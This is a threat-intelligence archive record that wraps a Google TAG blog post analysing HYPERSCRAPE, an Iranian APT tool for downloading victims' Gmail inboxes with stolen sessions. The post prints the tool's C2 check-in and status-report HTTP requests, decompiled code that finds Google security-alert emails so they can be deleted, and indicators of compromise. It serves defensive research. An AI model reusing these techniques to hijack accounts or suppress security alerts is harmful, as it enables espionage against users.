{ "id": "c046d39a-1059-49b0-869d-3ce40b7bdf79", "created_at": "2026-04-06T00:07:10.765409Z", "updated_at": "2026-04-10T03:34:00.59168Z", "deleted_at": null, "sha1_hash": "50f31bfb0da2c0c112f4a4117b71f09482acc35d", "title": "New Iranian APT data extraction tool", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 51852, "plain_text": "New Iranian APT data extraction tool\r\nBy Ajax Bash\r\nPublished: 2022-08-23 · Archived: 2026-04-05 13:43:30 UTC\r\nAs part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats\r\nincluding APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users. For\r\nyears, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques\r\nto conduct espionage aligned with the interests of the Iranian government. Now, we’re shining light on a new tool of\r\ntheirs.\r\nIn December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from\r\nGmail, Yahoo!, and Microsoft Outlook accounts. The attacker runs HYPERSCRAPE on their own machine to download\r\nvictims’ inboxes using previously acquired credentials. We have seen it deployed against fewer than two dozen accounts\r\nlocated in Iran. The oldest known sample is from 2020, and the tool is still under active development. We have taken\r\nactions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.\r\nThis post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a\r\nTelegram grabber tool. HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining\r\npurpose-built capabilities. Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but\r\nrather its effectiveness in accomplishing Charming Kitten’s objectives.\r\nHYPERSCRAPE Analysis\r\nHYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker\r\nhas hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser,\r\nwhich enables the basic HTML view in Gmail. Once logged in, the tool changes the account’s language settings to\r\nEnglish and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking\r\nthem unread. After the program has finished downloading the inbox, it reverts the language back to its original settings\r\nand deletes any security emails from Google. Earlier versions contained the option to request data from Google Takeout,\r\na feature which allows users to export their data to a downloadable archive file.\r\nThe tool is written in .NET for Windows PCs and is designed to run on the attacker's machine. We tested\r\nHYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo!\r\nand Microsoft accounts. HYPERSCRAPE won't run unless in a directory with other file dependencies.\r\nHYPERSCRAPE file metadata\r\nHYPERSCRAPE Setup\r\nWhen launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate\r\nif it's not found. In the version tested, the C2 was unobfuscated and stored as a hardcoded string. In later versions it was\r\nobfuscated with Base64.\r\nGET http://{C2}/Index.php?Ck=OK HTTP/1.1\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 1 of 6\n\nHost: {C2}\r\nAccept-Encoding: gzip\r\nConnection: Keep-Alive\r\nThe tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string\r\nto a valid cookie file. A new form is displayed if the information is not provided via command prompt.\r\nInitial form to specify operation parameters\r\nOnce provided, the data in the \"Identity\" field is sent to a C2 for confirmation. Again, the response is expected to be\r\n\"OK\".\r\nGET http://{C2}/Index.php?vubc={identity} HTTP/1.1\r\nHost: {C2}\r\nAccept-Encoding: gzip\r\nIf the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and\r\ndrop.\r\nThe cookie drag and drop form\r\nAfter parsing, the cookies are inserted into a local cache used by the embedded web browser. A new folder named\r\n\"Download\" is created adjacent to the main binary. The browser then navigates to Gmail to begin the data collection.\r\nThe user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the\r\nattacker to enable the basic HTML view in Gmail.\r\nThe error page from using an unsupported browser\r\nIf the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter\r\ncredentials to proceed, as the program will wait until it finds the inbox page.\r\nWhat HYPERSCRAPE does\r\nOnce the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English,\r\nchanging it if not. The language is returned to its original setting when the run is finished.\r\nHYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download. It does the\r\nfollowing for each email found:\r\nClicks on the email and opens it\r\nDownloads it\r\nIf the email was originally unread, marks it unread\r\nGoes back to the inbox\r\nThe emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the\r\nsubject. A log file is written containing a count of the emails that were downloaded.\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 2 of 6\n\nWhen finished, a HTTP POST request is made to the C2 to relay the status and system information. The downloaded\r\nemails are not sent to the C2.\r\nPOST http://{C2}/?Key={GUID}\u0026Crc={Identifier}\r\n{\r\n\"appName\": \"Gmail Downloader\",\r\n\"targetname\": \"{Email}\",\r\n\"HostName\": \"REDACTED\",\r\n\"srcUserIP\": \"REDACTED\",\r\n\"actionType\": \"First\",\r\n\"timeOccurrence\": \"05/01/2022 05:50:31 PM\",\r\n\"OS\": \"REDACTED\",\r\n\"OSVersion\": \"REDACTED\",\r\n\"SystemModel\": \"REDACTED\",\r\n\"SystemType\": \"REDACTED\",\r\n\"srcName\": \"REDACTED\",\r\n\"srcOrgName\": \"REDACTED\"\r\n}\r\nThe program will delete any security emails from Google generated by the attacker’s activity.\r\nprivate bool IsThereAnyEMail() {\r\nList \u003c GeckoHtmlElement \u003e list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\")\r\nwhere x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") ||\r\nx.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\")\r\n|| x.TextContent.StartsWith(\"Critical security alert\") || x.TextContent.StartsWith(\"Access for less secure apps has been\r\nturned on\") || x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.StartsWith(\"Help us protect\r\nyou: Security advice from Google\") || x.TextContent.StartsWith(\"Access for less secure apps has been turned on\")\r\nselect x).ToList \u003c GeckoHtmlElement \u003e ();\r\nbool flag = list.Count == 0;\r\nreturn !flag;\r\n}\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 3 of 6\n\nEarly versions contained an option to request Google Takeout data\r\nData from Google Takeout is also available upon request, but the option was only found in early builds. The\r\nfunctionality was not automated and it's unclear why it was removed in later versions.\r\nWhen conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to\r\nrelay the cookies and account name, both of which are required to accomplish the Takeout. When they are received, the\r\nbrowser navigates to the official Takeout link to request and eventually download the exported data.\r\npublic void ManageTakeOut() {\r\nstring text = \"PipeName\";\r\nProcess process = new Process();\r\nprocess.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text);\r\nprocess.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName;\r\nprocess.Start();\r\nPipeCommunication pipeCommunication = new PipeCommunication(true, text);\r\nbool flag = false;\r\nwhile (!flag) {\r\ntry {\r\nJsonInfo jsonInfo = pipeCommunication.Read();\r\nswitch (jsonInfo.Type) {\r\ncase JsonType.GetCookies:\r\njsonInfo.Data = this.CookieText;\r\npipeCommunication.Write(jsonInfo);\r\nbreak;\r\ncase JsonType.TakeOutFile:\r\nflag = true;\r\nbreak;\r\ncase JsonType.GetUsername:\r\nwhile (this.OperationObject.GetUsername() == null) {\r\nThread.Sleep(1000);\r\n}\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 4 of 6\n\njsonInfo.Data = this.OperationObject.GetUsername();\r\npipeCommunication.Write(jsonInfo);\r\nbreak;\r\n}\r\n} catch (Exception) {\r\nbool hasExited = process.HasExited;\r\nif (hasExited) {\r\nflag = true;\r\n}\r\n}\r\n}\r\npipeCommunication.Close();\r\n}\r\nProtecting Our Users\r\nTAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security\r\ncommunity, and for companies and individuals that may be targeted. It’s why we do things like work with our\r\nCyberCrime Investigation Group to share critical information relevant to law enforcement. We hope doing so will\r\nimprove understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger\r\nprotections across the industry. We’ll also continue to apply those findings internally to improve the safety and security\r\nof our products so we can effectively combat threats and protect users who rely on our services. In the meantime, we\r\nencourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level\r\nEnhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.\r\nHYPERSCRAPE Indicators\r\nC2s\r\n136.243.108.14\r\n173.209.51.54\r\nHYPERSCRAPE binaries\r\n03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369\r\n35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208\r\n5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 5 of 6\n\n6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f\r\n767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4\r\n977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f\r\nac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6\r\ncd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa\r\nMicrosoft Live DLL\r\n1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23\r\nPDB\r\nE:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb\r\nE:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb\r\nSource: https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/" ], "report_names": [ "new-iranian-apt-data-extraction-tool" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b07fec96-80cd-4d92-aa52-a26a0b25b7c2", "created_at": "2022-10-25T16:07:23.826594Z", "updated_at": "2026-04-10T02:00:04.760416Z", "deleted_at": null, "main_name": "Madi", "aliases": [ "Mahdi" ], "source_name": "ETDA:Madi", "tools": [ "Madi" ], "source_id": "ETDA", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434030, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.pdf", "text": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.txt", "img": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.jpg" } }